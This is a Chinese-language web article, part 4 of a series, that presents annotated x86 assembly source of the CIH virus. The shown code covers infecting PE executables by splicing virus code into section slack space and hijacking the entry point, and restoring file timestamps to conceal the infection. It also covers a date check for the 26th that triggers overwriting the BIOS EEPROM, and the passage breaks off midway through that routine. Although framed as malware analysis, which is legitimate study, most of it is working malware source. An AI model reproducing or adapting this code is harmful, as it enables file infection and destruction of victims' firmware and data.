病毒程序源码实例剖析-CIH病毒[4]

黄舟
发布: 2017-01-17 11:23:27
原创
2322人浏览过

push eax ;块表大小 
  push edx ;edx为病毒代码块表的偏移 
  push esi ;缓冲区地址
  
  ;合并的病毒代码块和病毒代码块表的总大小必须小于等于未使用的空间大小
  inc ecx 
  push ecx ; save numberofsections+1 
  
  shl ecx, 03h ;乘8 
  push ecx ;预留病毒块表空间 
  
  add ecx, eax 
  add ecx, edx ;ecx+文件的正文的偏移 
  
  sub ecx, (sizeofheaders-@9)[esi] 
  not ecx 
  inc ecx ;求补,ecx为文件头大小 - 正文的偏移 = 未用空间 
  
  push ecx 
  
  xchg ecx, eax ;ecx为块表大小 
  
  mov eax, (addressofentrypoint-@9][esi] ;入口rva地址 
  add eax, (imagebase-@9)[esi] ;装入基址 
  mov (originaladdressofentrypoint-@9)[esi], eax ;保存装入后实际的入口地址 
  
  ;未用空间和病毒第一块大小比较,如果小于就只设感染标志
  cmp word ptr [esp], small codesizeofmergeviruscodesection 
  jl onlysetinfectedmark 
  
  ; 读取所有病毒块表
  mov eax, ebp ;读的功能号 
  call edi ;读块表到esi(@9处) 
  
  ;下面完全修改处理winzip自解压文件的错误,当用户打开自解压文件时,
  ;病毒不会感染。首先,病毒获得第2个块表的torawdata指针,
  ;读取该块数据,判断是否包含“winzip(r)”字样
  
  xchg eax, ebp 
  push 00000004h 
  pop ecx 读4字节 
  
  push edx 
  mov edx, (sizeofscetiontable+pointertorawdata-@9][ebx] 
  ;edx为第二块的偏移(.rdata) 
  
  add edx, 12h ;加10h+2h(10h处为"winzip....") 
  
  call edi ;读4字节到esi 
  
  ;判断是否winzip自解压文件,如果是就不设置感染标志
  cmp dword ptr [esi], 'pizn' 
  je notsetinfectedmark 
  
  pop edx ;edx指向块表在文件中首址 
  
  ; 设置病毒代码块表
  pop ebx ;未用空间大小 
  pop edi ;edi = totalsizeofviruscodesectiontabl 
  pop ecx ; ecx = numberofsections+1 
  
  push edi 
  add edx, ebp ; ebp为块表大小 
  push edx ;文件指针 
  
  add ebp, esi ; ebp指向病毒数据区的块表后(第一块) 
  push ebp ;缓冲区地址 
  
  ; 设置第一个病毒代码块的大小 
  lea eax, [ebp+edi-04h] 
  mov [eax], ebx 
  
  ; 设置第一个病毒块
  push ebx ; 病毒代码第一块的大小
  
  add edx, edi 
  push edx ;文件指针
  lea edi, (myvirusstart-@9)[esi] 
  push edi ;缓冲区地址
  
  ;修改addressofentrypoint的入口为病毒入口
  mov (newaddressofentrypoint-@9)[esi], edx ;保存新的程序入口(病毒正文) 
  
  ; 设置初始数据
  lea edx, [esi-sizeofscetiontable] ;edx先减一项块表长度
  mov ebp, offset virussize ;ebp为病毒长度 
  
  jmp starttowritecodetosections 
  
  ;写信息到病毒块
  loopofwritecodetosections: 
  add edx, sizeofscetiontable 
  mov ebx, (sizeofrawdata-@9)[edx] ;ebx为该块表项的sizeofrawdata(块大小) 
  sub ebx, (virtualsize-@9][edx] ;减去virtualsize等于该块未用空间 
  jbe endofwritecodetosections 
  
  push ebx ; size 
  
  sub eax, 08h 
  mov [eax], ebx ;写入病毒块表 
  
  mov ebx, (pointertorawdata-@9)[edx] ;ebx为块的物理(实际)偏移
  add ebx, (virtualsize-@9)[edx] ;加上virtualsize 
  push ebx ;ebx指向该块未用空间的文件指针 
  
  push edi ; 缓冲区地址 
  
  mov ebx, (virtualsize-@9)[edx] 
  add ebx, (virtualaddress-@9)[edx] 
  add ebx, (imagebase-@9)[esi] ;ebx为该块装入后的实际地址 
  mov [eax+4], ebx ;保存到病毒块表中 
  
  mov ebx, [eax] ;该块未用空间大小 
  add (virtualsize-@9)[edx], ebx ;加到该块表项的virtualsize
  
  ;改该块表项的块属性(改为可读,并包含初始化数据)
  or (characteristics-@9)[edx], 40000040h 
  
  ;开始写代码
  starttowritecodetosections: 
  sub ebp, ebx ;病毒大小-病毒块大小 
  
  ;如果小于(病毒插入完毕)就设置病毒块表结束符
  jbe setviruscodesectiontableendmark 
  
  add edi, ebx ;指向病毒下一块 
  
  ;写代码结束
  endofwritecodetosections: 
  loop loopofwritecodetosections 
  
  onlysetinfectedmark: 
  mov esp, dr1 ;只设置感染标志 
  
  jmp writeviruscodetofile ;跳到写病毒到要传染的文件的程序 
  
  ;不设置感染标志
  notsetinfectedmark: 
  add esp, 3ch 
  jmp closefile ;转到closefile处 
  
  ;设置病毒块表和标记
  setviruscodesectiontableendmark: 
  ;调整病毒块代码
  add [eax], ebp ;更正病毒块表的最后一项 
  add [esp+08h], ebp 
  
  ;设置块表结束标志
  xor ebx, ebx 
  mov [eax-04h], ebx 
  
  ; 当病毒程序调用 vxd指令时,vmm修改20号中断
  lea eax, (lastvxdcalladdress-2-@9)[esi] ;上一个调用vxd指令的地址 
  
  mov cl, vxdcalltablesize ;所用vxd调用的个数 
  
  loopofrestorevxdcallid: 
  mov word ptr [eax], 20cdh ;还原成“int 20h”的形式 
  
  ;从vxdcallidtable取出vxd调用的id号放到edx
  mov edx, (vxdcallidtable+(ecx-1)*04h-@9)[esi] 
  
  mov [eax+2], edx ;放到“int 20h”的后面
  
  ;vxdcalladdresstable中放着各个调用vxd的指令地址之差
  movzx edx, byte ptr (vxdcalladdresstable+ecx-1-@9)[esi] 
  
  sub eax, edx ;eax为上一个调用地址 
  
  loop loopofrestorevxdcallid ;还原其他的调用 
  
  ; 把病毒代码写到文件中
  writeviruscodetofile: 
  mov eax, dr1 ;dr1为前面所保存的esp 
  mov ebx, [eax+10h] ;ebx为保存在栈中的保存文件句柄
  mov edi, [eax] ;edi为保存在栈中的ifsmgr_ring0_fileio调用地址
  
  ;循环写入
  loopofwriteviruscodetofile: 
  pop ecx ;病毒代码各段的偏移 
  jecxz setfilemodificationmark ;到病毒偏移零为止 
  
  mov esi, ecx 
  mov eax, 0d601h ;写文件功能号(r0_writefile) 
  pop edx ;文件指针 
  pop ecx ;要写的字节数
  
  call edi ; vxd调用ifsmgr_ring0_fileio,写文件 
  ;依次写入各段病毒代码、病毒块表、新的
  ;文件块表、新的程序入口、感染标志 
  jmp loopofwriteviruscodetofile 
  
  ; 修改文件的最后修改时间,使用户不知道文件已经被修改
  setfilemodificationmark: 
  pop ebx 
  pop eax 
  
  stc ;设置进位标志 
  pushf ;标志位入栈 
  
  ; 关闭文件
  closefile: 
  xor eax, eax 
  mov ah, 0d7h ;关闭文件功能号 
  call edi ; vxd调用ifsmgr_ring0_fileio关闭文件
  
  popf 
  pop esi 
  jnc iskillcomputer ;如果进位标志为0,就转向killcomputer
  
  ;恢复文件修改时间
  mov ebx, edi 
  
  mov ax, 4303h 
  mov ecx, (filemodificationtime-@7)[esi] 
  mov edi, (filemodificationtime+2-@7)[esi] 
  call ebx ; vxd调用ifsmgr_ring0_fileio,修改文件的最后修改时间 
  
  
  ; 设置不“忙”标志
  disableonbusy: 
  dec byte ptr (onbusy-@7)[esi] 
  
  ; 调用原来的filesystemapihook 
  prevhook: 
  popad ;恢复所有寄存器 
  
  mov eax, dr0 ; 保存的原来的文件系统钩子程序首址 
  jmp [eax] ;跳到原来的钩子去执行 
  
  pifsfunc:
  mov ebx, esp ; ebx指向esp以获得filesystemapihookfunction的参数地址
  push dword ptr [ebx+20h+04h+14h] ;把参数pioreqpir入栈 
  call [ebx+20h+04h] ;调用pifsfunc fsdfnaddr 
  pop ecx 
  
  mov [ebx+1ch], eax ;修改eax的值
  
  ; 调用了pifsfunc之后,从返回值pioreq中获得数据
  cmp dword ptr [ebx+20h+04h+04h], 00000024h 
  jne quitmyvirusfilesystemhook 
  
  
  ;获得在dos模式下的文件的修改日期和时间 
  mov eax, [ecx+28h] 
  mov (filemodificationtime-@6)[esi], eax ;保存获得的文件时间和日期 
  
  
  ;退出病毒程序
  quitmyvirusfilesystemhook: 
  popad ;恢复所有寄存器 
  
  ret ;从病毒设置的文件钩子程序中退出 
  
  ; 破坏计算机bios
  iskillcomputer: 
  ;从bios cmos中获得当前日期 
  mov al, 07h 
  out 70h, al 
  in al, 71h 
  
  xor al, 26h ;判断是否是26号,
  
  ;如果是调试程序,则转向disableonbusy 
  if debug 
  jmp disableonbusy 
  else 
  jnz disableonbusy ;如果不是26号,则转向disableonbusy,不进行破坏 
  endif 
   
  ;开始 破坏bios eeprom *
  mov bp, 0cf8h 
  lea esi, ioforeeprom-@7[esi] 
  
  ;显示000e0000 - 000effff 地址段的bios页面,共64kb
  mov edi, 8000384ch 
  mov dx, 0cfeh 
  cli 
  call esi 
  
  ;显示000f0000 - 000fffff地址段的bios页面,共64kb 
  mov di, 0058h 
  dec edx ; and a0fh 
  mov word ptr (booleancalculatecode-@10)[esi], 0f24h 
  call esi 
  
  ; 显示bios中额外的000e0000 - 000e01ff段的 rom数据,共512个字节
  ;和可写的bios块
  lea ebx, enableeepromtowrite-@10[esi] 
  
  mov eax, 0e5555h 
  mov ecx, 0e2aaah 
  call ebx 
  mov byte ptr [eax], 60h

以上就是病毒程序源码实例剖析-CIH病毒[4]的内容,更多相关内容请关注PHP中文网(www.php.cn)!

码上飞
码上飞

码上飞(CodeFlying) 是一款AI自动化开发平台,通过自然语言描述即可自动生成完整应用程序。

码上飞138
查看详情 码上飞
最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习
PHP中文网抖音号
发现有趣的

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号